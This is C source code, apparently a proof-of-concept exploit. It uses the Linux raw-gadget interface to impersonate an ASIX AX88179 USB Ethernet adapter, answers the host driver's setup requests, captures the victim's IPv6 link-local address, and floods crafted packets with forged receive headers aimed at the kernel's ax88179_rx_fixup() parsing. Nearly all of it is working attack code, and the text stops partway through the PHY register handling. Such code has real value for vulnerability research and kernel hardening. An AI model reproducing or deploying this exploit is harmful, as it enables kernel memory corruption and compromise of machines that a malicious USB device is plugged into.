// compile with -pthread
// roughly based off https://github.com/xairy/raw-gadget/blob/master/examples/keyboard.c
// NOTE: this is playing fast-and-loose with endianness, it'll break on big-endian systems.

#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <stdbool.h>
#include <assert.h>
#include <alloca.h>
#include <stddef.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <net/ethernet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip6.h>
#include <netinet/udp.h>
#include <netinet/icmp6.h>
#include <linux/usb/cdc.h>
#include <linux/usb/raw_gadget.h>
#include <linux/mii.h>
#include <linux/mdio.h>
#include <arpa/inet.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int usb_fd;

struct usb_raw_control_event {
  struct usb_raw_event inner;
  struct usb_ctrlrequest ctrl;
};

static struct usb_device_descriptor usb_device = {
  .bLength = USB_DT_DEVICE_SIZE,
  .bDescriptorType = USB_DT_DEVICE,
  .bcdUSB = __constant_cpu_to_le16(0x0200), /* USB 2.0 */
  .bDeviceClass = __constant_cpu_to_le16(USB_CLASS_COMM), // is this even used?
  .bMaxPacketSize0 = 64, /* maximum value the kernel lets us use */

  /* ASIX AX88179 10/100/1000 */
  .idVendor = __constant_cpu_to_le16(0x0b95),
  .idProduct = __constant_cpu_to_le16(0x1790),

  .iManufacturer = 1,
  .iProduct = 2,
  .iSerialNumber = 3,

  .bNumConfigurations = 1
};

struct usb_config_descriptor usb_config = {
  .bLength = USB_DT_CONFIG_SIZE,
  .bDescriptorType = USB_DT_CONFIG,
  .wTotalLength = 0, // fixed up later
  .bNumInterfaces = 1,
  .bConfigurationValue = 1,
  .iConfiguration = 4,
  .bmAttributes =
    USB_CONFIG_ATT_ONE |// must be set
    USB_CONFIG_ATT_SELFPOWER,
  .bMaxPower = 0 // no power draw from host
};
struct usb_interface_descriptor usb_interface = {
  .bLength = USB_DT_INTERFACE_SIZE,
  .bDescriptorType = USB_DT_INTERFACE,
  .bInterfaceNumber = 0,
  .bAlternateSetting = 0,
  .bNumEndpoints = 3,
  .bInterfaceClass = USB_CLASS_COMM, // ?
  .bInterfaceSubClass = USB_CDC_SUBCLASS_ETHERNET,
  .bInterfaceProtocol = USB_CDC_PROTO_NONE,
  .iInterface = 5,

};
struct usb_endpoint_descriptor usb_endpoint_in = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 512,
  //.bInterval = 1
};
struct usb_endpoint_descriptor usb_endpoint_out = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_OUT | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 512,
  //.bInterval = 1
};
struct usb_endpoint_descriptor usb_endpoint_intr = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 2,
  .bmAttributes = USB_ENDPOINT_XFER_INT,
  .wMaxPacketSize = 8,
  .bInterval = 1
};
unsigned short intr_handle, in_handle, out_handle;

void usb_reply(const void *data, size_t len, size_t req_length) {
  printf("         REPLY: size %lu, req_length %lu\n", (unsigned long)len, (unsigned long)req_length);
  if (len > req_length)
    len = req_length;
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+len);
  io->ep = 0;
  io->flags = 0;
  io->length = len;
  memcpy(io->data, data, len);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_WRITE, io));
}

void usb_get_and_ack(void *buf, size_t len, size_t req_length) {
  printf("         ACK OUT: req_length %lu\n", (unsigned long)req_length);
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+req_length);
  memset(io, 0xee, sizeof(struct usb_raw_ep_io)+req_length);
  io->ep = 0;
  io->flags = 0;
  io->length = req_length;
  //printf("issuing USB_RAW_IOCTL_EP0_READ with io->length=%u\n", io->length);
  int ret_len = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_READ, io));
  assert(ret_len == req_length);
  if (buf) {
    if (len > req_length) {
      memset(buf, '\0', len);
      len = req_length;
    }
    memcpy(buf, ((char*)io)+sizeof(struct usb_raw_ep_io), len);
  }
}
void usb_ack(size_t req_length) {
  usb_get_and_ack(NULL, 0, req_length);
}

void descr_append(void *buf, size_t *buf_len, void *descr, size_t descr_len) {
  printf("           descr_append(buf, len, descr, descr_len=%lu with first byte %hhu\n", (unsigned long)descr_len, *(unsigned char *)descr);
  assert(descr_len <= 255);
  assert(descr_len >= 2);
  assert(((unsigned char*)descr)[0] == descr_len);
  memcpy(buf + *buf_len, descr, descr_len);
  (*buf_len) += descr_len;
  ((struct usb_config_descriptor*)buf)->wTotalLength = __cpu_to_le16(*buf_len);
}

char hex_digit(unsigned char value) {
  if (value >= 10)
    return 'a' + (value - 10);
  else
    return '0' + value;
}

char *ipv6_addr_str(struct in6_addr addr) {
  static char str[128 + 7 + 1];
  for (int i=0; i<8; i++) {
    str[i*5+0] = hex_digit(addr.s6_addr[2*i+0] >> 4);
    str[i*5+1] = hex_digit(addr.s6_addr[2*i+0] & 0xf);
    str[i*5+2] = hex_digit(addr.s6_addr[2*i+1] >> 4);
    str[i*5+3] = hex_digit(addr.s6_addr[2*i+1] & 0xf);
    str[i*5+4] = (i == 7) ? '\0' : ':';
  }
  return str;
}

unsigned short ip6_checksum(struct ip6_hdr *ip6hdr, void *buf, int len) {
  struct {
    struct in6_addr src;
    struct in6_addr dst;
    unsigned int packet_length;
    unsigned char zero_pad[3];
    unsigned char next_header;
  } pseudo_header = {
    .src = ip6hdr->ip6_src,
    .dst = ip6hdr->ip6_dst,
    .packet_length = ip6hdr->ip6_ctlun.ip6_un1.ip6_un1_plen,
    .next_header = ip6hdr->ip6_ctlun.ip6_un1.ip6_un1_nxt
  };

  unsigned int res = 0;
  int count = sizeof(pseudo_header);
  unsigned short *buf_ = (void*)&pseudo_header;
  while (count > 1) {
    res += *buf_;
    buf_++;
    count -= 2;
  }

  count = len;
  buf_ = buf;
  while (count > 1) {
    res += *buf_;
    buf_++;
    count -= 2;
  }
  if (count > 0) res += *(unsigned char *)buf_;
  while (res >> 16) res = (res & 0xffff) + (res >> 16);
  return ~res;
}

void send_bulk(void *data, size_t len) {
  static pthread_mutex_t bulk_mutex = PTHREAD_MUTEX_INITIALIZER;

  pthread_mutex_lock(&bulk_mutex);
  bool last;
  size_t off = 0;
  do {
    last = ((len-off) <= 512);
    size_t frag_len = last ? (len-off) : 512;
    struct {
      struct usb_raw_ep_io inner;
      char data[512];
    } io = {
      .inner = {
        .ep = in_handle,
        .flags = last ? USB_RAW_IO_FLAGS_ZERO : 0,
        .length = frag_len,
      },
    };
    memcpy(io.data, data+off, frag_len);
    SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io));
    off += frag_len;
  } while (!last);
  pthread_mutex_unlock(&bulk_mutex);
}

struct in6_addr victim_ip6_addr;
static const unsigned char victim_mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 };
void *bogo_packet_thread_fn(void *arg) {
  while(1) {
    sleep(10);
    printf("<<<<<<<<<<<<<<<<<<<<<< SENDING 0x10000 BOGUS PACKETS >>>>>>>>>>>>>>>>>>>>>>>\n");
    for (int csum = 0; csum < 0x10000; csum++) {
      if (csum % 0x1000 == 0)
        sleep(1);

      struct {
        struct {
          //unsigned int pkt_hdrs[64];
          unsigned char pad1[0x6600];
          union {
            unsigned char pad2[0x100];
            struct {
              unsigned char ip_align_pseudo_header[2];
              struct ether_header ethh;
              struct ip6_hdr ip6;
              //struct udphdr udp;
              struct icmp6_hdr icmp;
            };
          };
          unsigned char pad[0x6800 - 0x6700 - 4 - 8*4];
          unsigned int pkt_hdrs[8];
          unsigned int rx_hdr; // for ax88179_rx_fixup()
        } data;
      } bogo_packet = {
        .data = {
          .ethh = {
            .ether_type = htons(ETHERTYPE_IPV6),
          },
          .ip6 = {
            .ip6_ctlun = {
              .ip6_un1 = {
                .ip6_un1_flow = 6<<4, // HACK
                .ip6_un1_plen = htons(0x1fff - sizeof(struct ip6_hdr) - sizeof(struct ether_header) - 4),
                .ip6_un1_nxt = IPPROTO_ICMPV6,
                .ip6_un1_hlim = 128
              },
            },
            .ip6_src = { .s6_addr = {0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xf0, 0x0d} },
            .ip6_dst = /*hdr->ip6_src*/victim_ip6_addr
          },
          /*
          .udp = {
            .uh_sport = htons(1),
            .uh_dport = htons(1234),
            .uh_ulen = htons(0x1fff - sizeof(struct udphdr) - sizeof(struct ip6_hdr) - sizeof(struct ether_header) - 4),
            .uh_sum = htons(0xf00d) // unchecked
          },*/
          .icmp = {
            .icmp6_type = ICMP6_ECHO_REQUEST,
            .icmp6_code = 0,
            .icmp6_cksum = csum,
            .icmp6_dataun = { .icmp6_un_data16 = { 0, 0 } }
          },
          .pkt_hdrs = {
            0x1000<<16,
            0x1000<<16,
            0x1000<<16,
            0x1000<<16,
            0x1000<<16,
            0x1000<<16,
            0x600<<16,
            (0x1fff<<16) | (/*AX_RXHDR_L4_TYPE_UDP*/4)
          },
          .rx_hdr = (/*pkt_cnt*//*64*/8) | ((/*hdr_off*/offsetof(typeof(bogo_packet.data), pkt_hdrs))<<16)
        }
      };
      memcpy(bogo_packet.data.ethh.ether_dhost, victim_mac_addr, 6);
      memcpy(bogo_packet.data.ethh.ether_shost, victim_mac_addr, 6);
      bogo_packet.data.ethh.ether_shost[5] ^= 0xff;
      send_bulk(&bogo_packet, sizeof(bogo_packet));
    }
  }
}

void hexdump(void *data_, size_t len) {
  unsigned char *data = data_;
  while (1) {
    char linebuf[48+2+1+16+1+1];
    for (int i=0; i<16; i++) {
      if (i < len) {
        linebuf[3*i+0] = hex_digit(data[i] >> 4);
        linebuf[3*i+1] = hex_digit(data[i] & 0xf);
        linebuf[3*i+2] = ' ';
      } else {
        linebuf[3*i+0] = ' ';
        linebuf[3*i+1] = ' ';
        linebuf[3*i+2] = ' ';
      }
    }
    linebuf[48] = ' ';
    linebuf[49] = ' ';
    linebuf[50] = '|';
    for (int i=0; i<16; i++) {
      if (data[i] >= 0x20 && data[i] <= 0x7e)
        linebuf[51+i] = data[i];
      else
        linebuf[51+i] = '.';
    }
    linebuf[67] = '|';
    linebuf[68] = '|';

    puts(linebuf);
    if (len <= 16)
      break;
    len -= 16;
    data += 16;
  }
}

void *bulk_out_thread_fn(void *arg) {
  while (1) {
    struct {
      struct usb_raw_ep_io inner;
      char data[4096];
    } io = {
      .inner = {
        .ep = out_handle,
        .flags = 0,
        .length = sizeof(io.data)
      }
    };
    int res = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_READ, &io));
    printf("bulk_out: got %d bytes\n", res);
    if (res < 8)
      continue;
    unsigned int tx_len = *(unsigned int *)io.data;
    unsigned int gso_size = *(unsigned int *)(io.data+4);
    printf("  AX88179_178A: tx_len=%u gso_size=%u\n", tx_len, gso_size);
    if (res < 8 + sizeof(struct ether_header))
      continue;

    struct ether_header *ethh = (void*)(io.data+8);
    unsigned short  ether_type = ntohs(ethh->ether_type);
    const char *ether_type_name = "unknown";
    if (ether_type == ETHERTYPE_IP) ether_type_name = "IP";
    if (ether_type == ETHERTYPE_ARP) ether_type_name = "ARP";
    if (ether_type == ETHERTYPE_IPV6) ether_type_name = "IPV6";
    if (ether_type == ETHERTYPE_VLAN) ether_type_name = "VLAN";
    printf("  ETHERNET: %02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx -> %02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx TYPE 0x%02hx (%s)\n",
        ethh->ether_shost[0], ethh->ether_shost[1], ethh->ether_shost[2], ethh->ether_shost[3], ethh->ether_shost[4], ethh->ether_shost[5],
        ethh->ether_dhost[0], ethh->ether_dhost[1], ethh->ether_dhost[2], ethh->ether_dhost[3], ethh->ether_dhost[4], ethh->ether_dhost[5],
        ether_type, ether_type_name);

    int ether_payload_len = res - 8 - sizeof(struct ether_header);
    char *ether_payload = io.data + 8 + sizeof(struct ether_header);

    if (ether_type == ETHERTYPE_IPV6 && ether_payload_len >= sizeof(struct ip6_hdr)) {
      struct ip6_hdr *hdr = (void*)ether_payload;
      printf("  IPV6 SRC: %s\n", ipv6_addr_str(hdr->ip6_src));
      printf("  IPV6 DST: %s\n", ipv6_addr_str(hdr->ip6_dst));

      unsigned char next_header = hdr->ip6_ctlun.ip6_un1.ip6_un1_nxt;
      char *post_ip6_header = ether_payload + sizeof(struct ip6_hdr);

handle_end_of_header_or_option:;
      const char *ip6_payload_type_str = "unknown";
      if (next_header == IPPROTO_TCP) ip6_payload_type_str = "TCP";
      if (next_header == IPPROTO_UDP) ip6_payload_type_str = "UDP";
      if (next_header == IPPROTO_ICMP) ip6_payload_type_str = "ICMP";
      if (next_header == IPPROTO_ICMPV6) ip6_payload_type_str = "ICMPV6";
      if (next_header == IPPROTO_HOPOPTS) ip6_payload_type_str = "HOPOPTS";
      printf("  IPV6 PAYLOAD TYPE: 0x%02hhx (%s)\n", next_header, ip6_payload_type_str);

      if (next_header == IPPROTO_HOPOPTS) {
        struct ip6_hbh *hbh = (void*)post_ip6_header;
        int hbh_len = 8 + hbh->ip6h_len * 8;
        post_ip6_header += hbh_len;
        next_header = hbh->ip6h_nxt;
        goto handle_end_of_header_or_option;
      }

      if (next_header == IPPROTO_FRAGMENT) {
        struct ip6_frag *frag = (void*)post_ip6_header;
        int byte_offset = ntohs(frag->ip6f_offlg & IP6F_OFF_MASK);
        printf("<<< GOT FRAGMENT offset: %d bytes) >>>\n", byte_offset);
        size_t frag_len = (char*)hdr + ntohs(hdr->ip6_ctlun.ip6_un1.ip6_un1_plen) - (char*)(frag+1);
        hexdump(frag+1, frag_len);
      }

      if (next_header == IPPROTO_ICMPV6) {
        struct nd_neighbor_solicit *ns = (void*)post_ip6_header;
        printf("  ICMPV6 type: %u\n", ns->nd_ns_hdr.icmp6_type);
        if (ns->nd_ns_hdr.icmp6_type == ND_NEIGHBOR_SOLICIT && ns->nd_ns_target.s6_addr[14] == 0xf0 && ns->nd_ns_target.s6_addr[15] == 0x0d) {
          printf("  GOT ND_NEIGHBOR_SOLICIT\n");

          struct {
            struct {
              unsigned char ip_align_pseudo_header[2];
              struct ether_header ethh;
              struct ip6_hdr ip6;
              struct nd_neighbor_advert advert;
              struct nd_opt_hdr nd_opt;
              unsigned char changed_ether_addr[6];
              unsigned int blahpad;
              unsigned int pkt_hdrs[1];
              unsigned int rx_hdr;
            } data;
          } na_packet = {
            .data = {
              .ethh = {
                .ether_type = htons(ETHERTYPE_IPV6)
              },
              .ip6 = {
                .ip6_ctlun = {
                  .ip6_un1 = {
                    .ip6_un1_flow = 6<<4, // HACK
                    .ip6_un1_plen = htons(sizeof(na_packet.data) - offsetof(typeof(na_packet.data), advert) - 12),
                    .ip6_un1_nxt = IPPROTO_ICMPV6,
                    .ip6_un1_hlim = 255
                  },
                },
                .ip6_src = { .s6_addr = {0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xf0, 0x0d} },
                .ip6_dst = hdr->ip6_src
              },
              .advert = {
                .nd_na_hdr = {
                  .icmp6_type = ND_NEIGHBOR_ADVERT,
                  .icmp6_code = 0,
                  .icmp6_cksum = 0, // fixed up
                  .icmp6_dataun = {.icmp6_un_data8 = { 6/*solicited override*/ }}
                },
                .nd_na_target = { .s6_addr = {0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xf0, 0x0d} }
              },
              .nd_opt = {
                .nd_opt_type = ND_OPT_TARGET_LINKADDR,
                .nd_opt_len = 1
              },
              .pkt_hdrs = { (sizeof(na_packet.data) - 8) << 16 },
              .rx_hdr = (/*pkt_cnt*/1) | ((/*hdr_off*/offsetof(typeof(na_packet.data), pkt_hdrs))<<16)
            }
          };
          memcpy(na_packet.data.ethh.ether_dhost, ethh->ether_shost, 6);
          memcpy(na_packet.data.ethh.ether_shost, ethh->ether_shost, 6);
          na_packet.data.ethh.ether_shost[5] ^= 0xff;
          memcpy(na_packet.data.changed_ether_addr, na_packet.data.ethh.ether_shost, 6);
          na_packet.data.advert.nd_na_hdr.icmp6_cksum = ip6_checksum(&na_packet.data.ip6, (void*)&na_packet.data.advert, sizeof(na_packet.data.advert)+sizeof(na_packet.data.nd_opt)+sizeof(na_packet.data.changed_ether_addr));
          send_bulk(&na_packet, sizeof(na_packet));
          printf("    SENT REPLY\n");
        }
      }

      static bool sent_bogo_packet = false;
      if (!sent_bogo_packet && hdr->ip6_src.s6_addr[0] == 0xfe && hdr->ip6_src.s6_addr[1] == 0x80) {
        sent_bogo_packet = true;
        victim_ip6_addr = hdr->ip6_src;
        pthread_t send_thread;
        pthread_create(&send_thread, NULL, bogo_packet_thread_fn, NULL);
      }
    }
  }
}

int main(void) {
  usb_fd = SYSCHK(open("/dev/raw-gadget", O_RDWR));

  struct usb_raw_init init_args = {
    .driver_name = "dummy_udc",
    .device_name = "dummy_udc.0",
    .speed = USB_SPEED_HIGH
  };
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_INIT, &init_args));
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_RUN, 0));

  int state = 0;

  while (1) {
    if (state == 1) {
      sleep(2);
      printf("===================== BRINGING LINK UP =====================\n");
      struct {
        struct usb_raw_ep_io io;
        struct { /*ax88179_int_data*/
          unsigned int intdata1;
          unsigned int intdata2;
        } data;
      } io_with_data = {
        .io = {
          .ep = intr_handle,
          .flags = 0,
          .length = sizeof(io_with_data.data)
        }, .data = {
          .intdata1 = 1<<16 /* AX_INT_PPLS_LINK */
        }
      };
      SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io_with_data));
      state = 2;
    }

    struct usb_raw_control_event control_ev = {
      .inner = { .type = 0, .length = sizeof(control_ev.ctrl) }
    };
    SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EVENT_FETCH, &control_ev));
    if (control_ev.inner.type == USB_RAW_EVENT_CONNECT) {
      printf("got connect:\n");
      struct usb_raw_eps_info eps_info;
      int eps_count = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EPS_INFO, &eps_info));
      printf("  device controller's available non-control endpoints:\n");
      for (int i=0; i<eps_count; i++) {
        struct usb_raw_ep_info *ep = &eps_info.eps[i];
        printf("    ep[%d]: name='%s' addr=%u iso=%d bulk=%d int=%d in=%d out=%d maxpacket_limit=%u max_streams=%u\n",
               i, ep->name, ep->addr,
               ep->caps.type_iso, ep->caps.type_bulk, ep->caps.type_int, ep->caps.dir_in, ep->caps.dir_out,
               ep->limits.maxpacket_limit, ep->limits.max_streams);
      }
      // TODO assign controller's endpoints to our gadget stuff?
    } else if (control_ev.inner.type == USB_RAW_EVENT_CONTROL) {
      unsigned req_length = __le16_to_cpu(control_ev.ctrl.wLength);
      bool is_dir_in = (control_ev.ctrl.bRequestType & USB_DIR_IN) != 0;
      printf("got control (in=%d, wLength=%u):\n", is_dir_in, req_length);
      switch (control_ev.ctrl.bRequestType & USB_TYPE_MASK) {
        case USB_TYPE_STANDARD:
          switch(control_ev.ctrl.bRequest) {
            case USB_REQ_GET_DESCRIPTOR: {
              unsigned descriptor_type = control_ev.ctrl.wValue >> 8;
              switch (descriptor_type) {
                case USB_DT_DEVICE:
                  printf("  getting device descriptor\n");
                  usb_reply(&usb_device, sizeof(usb_device), req_length);
                  break;
                case USB_DT_CONFIG: {
                  printf("  getting dt config\n");
                  char dt_config[1024*128];
                  size_t dt_config_len = 0;
                  descr_append(dt_config, &dt_config_len, &usb_config, sizeof(usb_config));
                  descr_append(dt_config, &dt_config_len, &usb_interface, sizeof(usb_interface));
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_in, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_out, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_intr, USB_DT_ENDPOINT_SIZE);
                  usb_reply(dt_config, dt_config_len, req_length);
                } break;
                case USB_DT_STRING: {
                  unsigned string_id = control_ev.ctrl.wValue & 0xff;
                  printf("  getting string %d\n", string_id);
                  if (string_id == 0) {
                    unsigned char string_descr[] = {
                      4/*length*/, USB_DT_STRING,
                      0x09, 0x04 /* English - United States */
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  } else {
                    unsigned char string_descr[] = {
                      12/*length*/, USB_DT_STRING,
                      'D',0,'U',0,'M',0,'M',0,'Y',0
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  }
                } break;
                default:
                  errx(1, "USB_REQ_GET_DESCRIPTOR: descriptor_type=%x", descriptor_type);
              }
            } break;
            case USB_REQ_SET_CONFIGURATION: {
              static bool have_set_configuration = false;
              printf("  set configuration\n");
              in_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_in));
              out_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_out));
              intr_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_intr));
              SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_CONFIGURE, 0));
              usb_ack(req_length);
              if (!have_set_configuration) {
                pthread_t bulk_out_thread;
                pthread_create(&bulk_out_thread, NULL, bulk_out_thread_fn, NULL);
              }
            } break;
            case USB_REQ_SET_INTERFACE: {
              printf("  set interface\n");
              usb_ack(req_length);
            } break;
            default:
              errx(1, "unknown standard ctrlrequest 0x%x", (unsigned)control_ev.ctrl.bRequest);
          }
          break;
        case USB_TYPE_CLASS:
          errx(1, "unknown class ctrlrequest");
        case USB_TYPE_VENDOR:
          switch (control_ev.ctrl.bRequest) {
            case 0x01/*AX_ACCESS_MAC*/: {
              static unsigned char srom_addr;
              static const unsigned short ledvalue = (1<<15/*LED_VALID*/);
              printf("  AX_ACCESS_MAC\n");
              switch (control_ev.ctrl.wValue) {
                case 0x02/*PHYSICAL_LINK_STATUS*/: {
                  printf("    PHYSICAL_LINK_STATUS\n");
                  /* Linux checks AX_USB_SS and AX_USB_HS, influences URB size:
                   * ->rx_urb_size
                   * can be 0x5000 / 0x6000 / 0x6800 / 0x6800
                   * We prefer the biggest one (0x6800), which we get from
                   * setting setting nothing here plus GMII_PHY_PHYSR_GIGA.
                   */
                  unsigned char pl_status = 0; /*not AX_USB_SS/AX_USB_HS*/
                  usb_reply(&pl_status, sizeof(pl_status), req_length);
                } break;
                case 0x03/*GENERAL_STATUS*/: {
                  printf("    GENERAL_STATUS\n");
                  unsigned short general_status = __cpu_to_le16(0x04/*AX_SECLD*/);
                  usb_reply(&general_status, 2, req_length);
                } break;
                case 0x07/*AX_SROM_ADDR*/: {
                  printf("    AX_SROM_ADDR\n");
                  usb_get_and_ack(&srom_addr, 1, req_length);
                  printf("    SROM address: 0x%hhx\n", srom_addr);
                } break;
                case 0x08/*AX_SROM_DATA_LOW*/: {
                  printf("    AX_SROM_DATA_LOW from 0x%hhx\n", srom_addr);
                  if (srom_addr < 6) {
                    unsigned char eeprom_head[12] = {
                      /*0-5*/0, 0, 0, 0, 0, 0, // dontcare (first must not be FF)
                      /*6-9*/0, 0, 0, 0, // checksummed
                      /*10*/0xff // checksum
                    };
                    usb_reply(eeprom_head + srom_addr*2, 2, req_length);
                  } else if (srom_addr == 0x42) {
                    unsigned char b = 8 & 0xff;
                    usb_reply(&b, 1, req_length);
                  } else {
                    errx(1, "unhandled SROM range");
                  }
                } break;
                case 0x09/*AX_SROM_DATA_HIGH*/: {
                  printf("    AX_SROM_DATA_HIGH from 0x%hhx\n", srom_addr);
                  if (srom_addr == 0x42) {
                    unsigned char b = ledvalue >> 8;
                    usb_reply(&b, 1, req_length);
                  } else {
                    errx(1, "unhandled SROM range");
                  }
                } break;
                case 0x0a/*AX_SROM_CMD*/: {
                  printf("    AX_SROM_CMD\n");
                  if (is_dir_in) {
                    unsigned char value = 0; // EEP_BUSY would spin until timeout
                    usb_reply(&value, 1, req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case 0x0b/*AX_RX_CTL*/: {
                  unsigned short ax_rx_ctl_value;
                  usb_get_and_ack(&ax_rx_ctl_value, sizeof(ax_rx_ctl_value), req_length);
                  printf("    AX_RX_CTL = 0x%04hx  ################\n", ax_rx_ctl_value);
                } break;
                case 0x16/*AX_MULFLTARY*/: {
                  printf("    AX_MULFLTARY  ||||||||||||||||||||||||||||||||||||||||||\n");
                  usb_ack(req_length);
                  if (state == 0)
                    state = 1;
                } break;
                case 0x22/*AX_MEDIUM_STATUS_MODE*/: {
                  printf("    AX_MEDIUM_STATUS_MODE\n");
                  usb_ack(req_length);
                } break;
                case 0x24/*AX_MONITOR_MOD*/: {
                  printf("    AX_MONITOR_MOD\n");
                  usb_ack(req_length);
                } break;
                case 0x26/*AX_PHYPWR_RSTCTL*/: {
                  printf("    AX_PHYPWR_RSTCTL\n");
                  usb_ack(req_length);
                } break;
                case 0x2e/*AX_RX_BULKIN_QCTRL*/: {
                  printf("    AX_RX_BULKIN_QCTRL\n");
                  usb_ack(req_length);
                } break;
                case 0x34/*AX_RXCOE_CTL*/: {
                  printf("    AX_RXCOE_CTL\n");
                  usb_ack(req_length);
                } break;
                case 0x35/*AX_TXCOE_CTL*/: {
                  printf("    AX_TXCOE_CTL\n");
                  usb_ack(req_length);
                } break;
                case 0x54/*AX_PAUSE_WATERLVL_HIGH*/: {
                  printf("    AX_PAUSE_WATERLVL_HIGH\n");
                  usb_ack(req_length);
                } break;
                case 0x55/*AX_PAUSE_WATERLVL_LOW*/: {
                  printf("    AX_PAUSE_WATERLVL_LOW\n");
                  usb_ack(req_length);
                } break;
                case 0x73/*AX_LEDCTRL*/: {
                  printf("    AX_LEDCTRL\n");
                  usb_ack(req_length);
                } break;
                case 0x33/*AX_CLOCK_SELECT*/: {
                  printf("    AX_CLOCK_SELECT\n");
                  usb_ack(req_length);
                } break;
                case 0x10/*AX_NODE_ID*/: {
                  printf("    AX_NODE_ID\n");
                  if (is_dir_in) {
                    usb_reply(victim_mac_addr, sizeof(victim_mac_addr), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                default:
                  errx(1, "    unknown AX_ACCESS_MAC command 0x%02hhx", control_ev.ctrl.wValue);
              }
            } break;
            case 0x02/*AX_ACCESS_PHY*/: {
              printf("  AX_ACCESS_PHY\n");
              assert(control_ev.ctrl.wValue == 0x03/*AX88179_PHY_ID*/);
              static unsigned short mmd_id;
              static bool no_auto_increment;
              switch (control_ev.ctrl.wIndex) {
                case MII_BMCR: { /* Basic mode control register */
                  /* idk what any of these flags actually do in detail... */
                  printf("    MII_BMCR (basic mode control register)\n");
                  if (is_dir_in) {
                    unsigned short bmcr_state = BMCR_SPEED1000 | BMCR_FULLDPLX;
                    usb_reply(&bmcr_state, sizeof(bmcr_state), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_BMSR: { /* Basic mode status register */
                  printf("    MII_BMSR (basic mode status register)\n");
                  if (is_dir_in) {
                    unsigned short bmcr_state = BMSR_LSTATUS | BMSR_ESTATEN;
                    usb_reply(&bmcr_state, sizeof(bmcr_state), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_CTRL1000: {
                  printf("    MII_CTRL1000\n");
                  if (is_dir_in) {
                    unsigned short state = ADVERTISE_1000FULL;
                    usb_reply(&state, sizeof(state), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_STAT1000: {
                  printf("    MII_STAT1000\n");
                  if (is_dir_in) {
                    unsigned short state = LPA_1000FULL;
                    usb_reply(&state, sizeof(state), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_ADVERTISE: {
                  printf("    MII_ADVERTISE\n");
                  if (is_dir_in) {
                    unsigned short state = ADVERTISE_1000XFULL;
                    usb_reply(&state, sizeof(state), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_MMD_CTRL: {
                  printf("    MII_MMD_CTRL\n");
                  usb_get_and_ack(&mmd_id, 2, req_length);
                  mmd_id &= ~0x4000;
                  no_auto_increment = (mmd_id & 0x4000) != 0;
                  printf("    set ID %d, no-auto-increment %d\n", mmd_id, no_auto_increment);
                } break;
                case MII_MMD_DATA: {
                  printf("    MII_MMD_DATA (at ID %d)\n", mmd_id);
                  if (is_dir_in) {
                    switch (mmd_id) {
                      case MDIO_MMD_PCS:
                        printf("    Physical Coding Sublayer\n");
                        // decoded via mmd_eee_cap_to_ethtool_sup_t()
                        unsigned short eee_caps = MDIO_EEE_1000T;
                        usb_reply(&eee_caps, sizeof(eee_caps), req_length);
                        break;
                      case MDIO_MMD_AN:
                        printf("    Auto-Negotiation\n");
                        // WARNING: this is actually used in two different
                        //          contexts
                        unsigned short eee_adv = MDIO_EEE_1000T;
                        usb_reply(&eee_adv, sizeof(eee_adv), req_length);
                        break;
                      default:
                        errx(1, "unknown ID %d", mmd_id);
                    }
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_PHYADDR: {
                  printf("    MII_PHYADDR\n");
                  usb_ack(req_length);
                } break;
